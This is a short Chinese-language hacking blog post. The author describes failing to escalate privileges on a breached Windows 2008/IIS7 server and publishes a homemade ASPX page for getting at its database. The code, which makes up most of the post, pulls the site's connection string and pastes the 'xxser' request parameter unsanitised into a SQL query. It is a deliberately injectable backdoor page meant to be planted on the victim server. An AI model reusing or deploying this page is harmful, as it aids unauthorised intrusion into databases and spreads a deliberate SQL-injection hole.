昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
代码量不多,自己写个拉倒了。烦死了。
作者:xxser
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns= "http://www.w3.org/1999/xhtml" > <head runat= "server" > <title>暗影aspx构造注射专用页面</title> </head> <body> <form id= "form1" runat= "server" > <div> <script language= "c#" runat= "server" > void page_init( object sender, EventArgs e) { System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(); conn.ConnectionString = ConfigurationManager.ConnectionStrings[ "连接名" ].ToString(); conn.Open(); string i = this .Page.Request.Params[ "xxser" ]; //这里是参数?xxser=1 System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand( "select * from [表] where 列名= " + i, conn); int x = command.ExecuteNonQuery(); Response.Write(i+ "\n" ); Response.Write(x); conn.Close(); } </script> </div> </form> </body> </html> |
文章评论